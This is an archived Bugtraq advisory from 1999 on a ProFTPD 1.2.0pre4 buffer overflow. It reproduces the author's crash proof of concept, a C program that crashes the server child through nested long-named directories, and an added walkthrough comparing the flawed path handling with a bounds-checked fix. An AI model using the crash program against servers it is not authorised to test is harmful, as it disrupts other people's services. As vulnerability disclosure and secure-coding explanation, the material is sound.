The OpenNET Project
ProFTP-1.2.0pre4 buffer overflow -- once more


Date: Tue, 7 Sep 1999 18:51:26 +0200
From: Renaud Deraison <deraison@CVS.NESSUS.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: ProFTP-1.2.0pre4 buffer overflow -- once more


Hi,

I have found yet another buffer overflow in ProFTP 1.2.0pre4, which
may or may not be exploitable. I notified the authors and other
security-related people a week ago, and I have still got no answer, in spite
of my repost.

So either they do not care, or my setup is badly done.

Why it may not be easily exploited (or not at all): the
segmentation fault is not caused by a changed return address. The
overflow in fact changes a pointer and makes it point somewhere
else, and then FTPD calls strlen() on it. Anyway, other
variables may be changed too; I have not looked at it carefully yet.

How the overflow works: this is a variation of the infamous and
now-old wu-ftpd mkdir overflow (make a directory in another directory, in
another directory, and so on), but this time the names of the created
directories must not exceed 255 chars. That's all.

Attached to this message is a dumb program that will just make the remote
proftpd crash. Have a look at /var/log/messages, and you'll see something
as fun as:

Sep  1 14:18:49 prof proftpd[5327]: ProFTPD terminating (signal 11)

(quick note: the program does not check error codes, so make sure you
have the right to create directories in the appropriate directory, or
you'll get false positives/negatives).

This is *not* a DoS attack, since only a ProFTPd child will die.


I tested this flaw with proftpd 1.2.0pre4 as found at
ftp://ftp.tos.net/pub/proftpd.

This problem was tested on RedHat 6.0.



Patch: use something else / another good reason not to have
anonymous writeable directories.



				-- Renaud


--
Renaud Deraison
The Nessus Project
http://www.nessus.org

Attachment: crash_ftpd.c (decoded from the BASE64 MIME part; be sure to edit
TARGET and WRITEABLE_DIR before running it)

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
/*
 * Crashes ProFTPd 1.2.0pre4 because of a buffer overflow.
 *
 * This bug was discovered by the Nessus Security Scanner
 *
 * I don't know if this flaw can be exploited to gain
 * root privileges.
 *
 * The name of the created directory must not exceed 255 chars !
 *
 * Written by Renaud Deraison <deraison@cvs.nessus.org>
 */

/*
 * Change this !
 */
#define TARGET "192.168.1.5"
#define WRITEABLE_DIR "/incoming"

int main()
{
 struct in_addr target;
 int soc;
 struct sockaddr_in sa;

 /* first CWD into the anonymous-writeable directory */
 char * writeable_dir = "CWD "WRITEABLE_DIR"\r\n";
 char * mkd;
 char * cwd;

 inet_aton(TARGET, &target);
 mkd = malloc(300); bzero(mkd, 300);
 cwd = malloc(300); bzero(cwd, 300);

 soc = socket(PF_INET, SOCK_STREAM, 0);

 bzero(&sa, sizeof(sa));
 sa.sin_family = AF_INET;
 sa.sin_port   = htons(21);
 sa.sin_addr.s_addr = target.s_addr;
 if(!(connect(soc, (struct sockaddr *)&sa, sizeof(struct sockaddr_in))))
 {
  char * buf = malloc(1024);
  int i;

  /* "MKD XXX...X\r\n" and "CWD XXX...X\r\n" with a 254-char name:
     each command stays below the 255-char limit on its own */
  sprintf(mkd, "MKD ");
  memset(mkd+4, 'X', 254);
  strcat(mkd, "\r\n");

  sprintf(cwd, "CWD ");
  memset(cwd+4, 'X', 254);
  strcat(cwd, "\r\n");

  /* anonymous login */
  recv(soc, buf, 1024, 0);
  send(soc, "USER ftp\r\n", strlen("USER ftp\r\n"), 0);
  recv(soc, buf, 1024, 0);
  bzero(buf, 1024);
  send(soc, "PASS joe@\r\n", strlen("PASS joe@\r\n"), 0);
  recv(soc, buf, 1024, 0);
  bzero(buf, 1024);
  send(soc, writeable_dir, strlen(writeable_dir), 0);
  recv(soc, buf, 1024, 0);
  bzero(buf, 1024);

  /* mkdir, cd into it, repeat: the cwd grows by ~255 chars per round.
     An empty reply means the child died (reply codes are not checked). */
  for(i=0;i<40;i++)
  {
   send(soc, mkd, strlen(mkd), 0);
   recv(soc, buf, 1024, 0);
   if(!strlen(buf))
   {
    printf("Remote FTPd crashed (see /var/log/messages)\n");
    exit(0);
   }
   bzero(buf, 1024);
   send(soc, cwd, strlen(cwd), 0);
   recv(soc, buf, 1024, 0);
   if(!strlen(buf))
   {
    printf("Remote FTPd crashed (see /var/log/messages)\n");
    exit(0);
   }
   bzero(buf, 1024);
  }
  printf("You were not vulnerable after all. Sorry\n");
  close(soc);
 }
 else perror("connect ");
 return(0);
}
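The bug class behind the post, as an added example (this is not Renaud's code and not proftpd's source): a session keeps its current directory in a fixed buffer, and every accepted CWD appends "/<name>". Each name sent by the attached program is a legal 254 characters; it is the accumulated path that overruns the buffer and clobbers whatever variable follows it, which is how a later strlen() ends up dereferencing a corrupted pointer. The 1024-byte buffer, the "neighbour" canary placed right after it and the component size are assumptions chosen for illustration; the model replays the MKD/CWD rounds against an unchecked strcat() and against a length-checked version side by side.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/*
 * Hypothetical model of the overflow described in the post; NOT proftpd's
 * real code or memory layout.  arena[0..CWD_CAP) plays the fixed cwd buffer,
 * the bytes right after it play the neighbouring variable (in the real crash,
 * a pointer later handed to strlen()).  ARENA_CAP is oversized only so the
 * demo itself never writes out of bounds.
 */
#define CWD_CAP        1024            /* size the code believes its cwd buffer has */
#define ARENA_CAP      4096            /* real backing store for the demo */
#define COMPONENT_LEN  254             /* one directory name, as the attached program sends */
#define CANARY         "PTR-AFTER-CWD" /* stands in for the neighbouring variable */

struct session {
    char arena[ARENA_CAP];
};

static void session_init(struct session *s)
{
    memset(s->arena, 0, sizeof s->arena);
    strcpy(s->arena, "/incoming");                       /* assumed writeable dir */
    memcpy(s->arena + CWD_CAP, CANARY, sizeof CANARY);   /* neighbour after the buffer */
}

static bool neighbour_intact(const struct session *s)
{
    return memcmp(s->arena + CWD_CAP, CANARY, sizeof CANARY) == 0;
}

/* Vulnerable pattern: trusts the per-component limit, never measures the total. */
static void cwd_unchecked(struct session *s, const char *name)
{
    strcat(s->arena, "/");
    strcat(s->arena, name);
}

/* Hardened pattern: size the result before writing; refuse if it does not fit
   together with its terminating NUL.  Returns false when the CWD is rejected
   (the server would answer 550 and keep the old cwd). */
static bool cwd_checked(struct session *s, const char *name)
{
    size_t cur = strlen(s->arena);
    size_t add = 1 + strlen(name);                       /* '/' + name */
    if (cur + add + 1 > CWD_CAP)
        return false;
    s->arena[cur] = '/';
    memcpy(s->arena + cur + 1, name, add - 1);
    s->arena[cur + add] = '\0';
    return true;
}

/* Replays `rounds` MKD/CWD rounds of 254 x 'X' (MKD only creates the directory
   so CWD can succeed; only the CWD touches the buffer).  Returns the 1-based
   round at which the neighbour was clobbered (unchecked) or the CWD was refused
   (checked); 0 if the run finished without either. */
static int run_rounds(int rounds, bool checked)
{
    struct session s;
    char name[COMPONENT_LEN + 1];

    memset(name, 'X', COMPONENT_LEN);
    name[COMPONENT_LEN] = '\0';
    session_init(&s);

    for (int i = 1; i <= rounds; i++) {
        if (checked) {
            if (!cwd_checked(&s, name))
                return i;
        } else {
            cwd_unchecked(&s, name);
            if (!neighbour_intact(&s))
                return i;
        }
    }
    return 0;
}

/* After any number of checked rounds the neighbour must be untouched. */
static bool checked_keeps_neighbour(int rounds)
{
    struct session s;
    char name[COMPONENT_LEN + 1];

    memset(name, 'X', COMPONENT_LEN);
    name[COMPONENT_LEN] = '\0';
    session_init(&s);
    for (int i = 0; i < rounds; i++)
        (void)cwd_checked(&s, name);
    return neighbour_intact(&s);
}

int main(void)
{
    printf("unchecked: neighbour clobbered at round %d\n", run_rounds(40, false));
    printf("checked:   CWD refused at round %d\n", run_rounds(40, true));
    return 0;
}
```

Starting from "/incoming" (9 bytes) each round adds 255 bytes, so three rounds fit (774 bytes) and the fourth would need 1030: the unchecked version silently overwrites the neighbour on exactly the round where the checked version refuses the CWD. This is why a per-command length limit alone is not a fix; the accumulated state has to be bounded too, and refusing the command (rather than truncating the path) keeps the session in a consistent directory.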
